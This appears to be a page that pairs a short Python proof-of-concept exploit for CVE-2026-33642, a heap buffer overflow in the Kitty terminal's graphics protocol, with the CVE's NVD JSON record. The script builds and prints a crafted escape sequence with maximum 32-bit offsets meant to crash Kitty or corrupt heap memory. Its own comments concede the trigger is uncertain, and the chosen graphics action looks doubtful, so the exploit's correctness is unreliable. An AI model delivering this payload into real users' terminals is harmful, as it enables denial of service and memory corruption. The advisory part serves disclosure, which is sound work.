CVE-2026-33642

#!/usr/bin/env python3 # PoC for CVE-2026-33642 (Kitty Heap Buffer Overflow) # This script generates a malicious escape sequence to trigger the integer wrapping vulnerability. # The payload sends a graphics command with crafted large offsets to cause OOB access. import sys def generate_malicious_payload(): # Start of Kitty Graphics Protocol escape sequence # Format: ESC_G ... ; ESC\ # We try to trigger the bug in handle_compose_command by crafting offsets # that wrap around the unsigned 32-bit check. # Using a large value (e.g., close to 2^32 or specific wrapping value) # to simulate the x_offset/y_offset that causes the overflow. malicious_offset = 4294967295 # Max uint32, causes wrapping in specific arithmetic contexts # Constructing a payload that attempts to use these offsets. # Note: Actual trigger depends on specific implementation of compose_rectangles. payload = "\033_G" payload += f"f=32,s=1,v=1,a=T,t=f,x={malicious_offset},y={malicious_offset}," payload += "i=1,p=1,q=2;" payload += "AAAA" # Dummy data payload += "\033\\" return payload if __name__ == "__main__": print("[+] Generating malicious payload for CVE-2026-33642...") print("[!] Printing payload to stdout. If running in Kitty, this may crash the terminal.") sys.stdout.write(generate_malicious_payload()) sys.stdout.flush()

{"cve": {"id": "CVE-2026-33642", "sourceIdentifier": "[email protected]", "published": "2026-05-19T19:16:49.293", "lastModified": "2026-05-19T21:08:41.030", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kitty is a cross-platform GPU based terminal. In versions 0.46.2 and below, the handle_compose_command() function in kitty/graphics.c performs bounds validation on composition offsets using unsigned 32-bit arithmetic that is subject to integer wrapping, potentially leading to Heap Buffer Over-Read/Write. An attacker who can write escape sequences to a kitty terminal (e.g., via a malicious file, SSH login banner, or piped content) can supply crafted x_offset/y_offset values that pass the bounds check after wrapping but cause massive out-of-bounds heap memory access in compose_rectangles(). No user interaction is required. No non-default configuration is required. The attacker only needs the ability to produce output in a kitty terminal window. This issue has been fixed in version 0.47.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.3}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-190"}, {"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://github.com/kovidgoyal/kitty/commit/e9661f0f3afb4e4dbffa509adfb3df3c9780ad34", "source": "[email protected]"}, {"url": "https://github.com/kovidgoyal/kitty/security/advisories/GHSA-qfgm-2c64-6x3x", "source": "[email protected]"}, {"url": "https://github.com/kovidgoyal/kitty/security/advisories/GHSA-qfgm-2c64-6x3x", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}